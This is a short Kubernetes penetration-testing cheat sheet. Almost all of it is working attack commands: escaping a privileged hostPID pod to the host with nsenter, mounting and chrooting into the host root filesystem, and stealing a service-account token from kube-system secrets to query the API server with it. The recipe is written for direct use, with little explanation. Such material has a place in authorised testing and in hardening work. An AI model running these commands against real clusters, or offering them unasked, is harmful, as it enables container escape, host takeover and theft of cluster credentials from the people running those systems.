# kubernetes pentest

## Full access mode

The folowing pod can mount host root fs, access all processes og the host

```bash
kubectl apply -f full-access-pod.yaml
kubectl exec -ti -n default nginx-ingress-controller-9ckjz bash
```

### Privileged and hostPID

Inside the pod run the following commands

```bash
nsenter --target 1 --mount --uts --ipc --net --pid -- bash
```

### Mount host root filesystem

Inside the pod run the following commands

```bash
mkdir /chroot && mount /dev/mdx chroot
chroot /chroot
bash
mount -t proc proc /proc
```

## Secret stealing with rolebinding, serviceaccount and pod creation access in kube-system

The folowing pod can steal secret and so kubernetes access token from kube-system ns

```bash
kubectl apply -f kube-system-role-stealing.yaml
kubectl exec -ti -n kube-system kubedns-server sh
```

```bash
curl -LO https://storage.googleapis.com/kubernetes-release/release/v1.25.0/bin/linux/amd64/kubectl
chmod +x ./kubectl
./kubectl get secrets
```

Now we can exploit stollen token

```bash
# Point to the internal API server hostname
APISERVER=https://kubernetes.default.svc
# Path to ServiceAccount token
SERVICEACCOUNT=/var/run/secrets/kubernetes.io/serviceaccount
# Read this Pod's namespace
NAMESPACE=$(cat ${SERVICEACCOUNT}/namespace)
# Read the ServiceAccount bearer token
TOKEN=$(./kubectl get secret mysecretstollen -o=jsonpath='{.data.token}' | base64 -d)
# Reference the internal certificate authority (CA)
CACERT=${SERVICEACCOUNT}/ca.crt
# Explore the API with TOKEN
curl --cacert ${CACERT} --header "Authorization: Bearer ${TOKEN}" -X GET ${APISERVER}/api
```
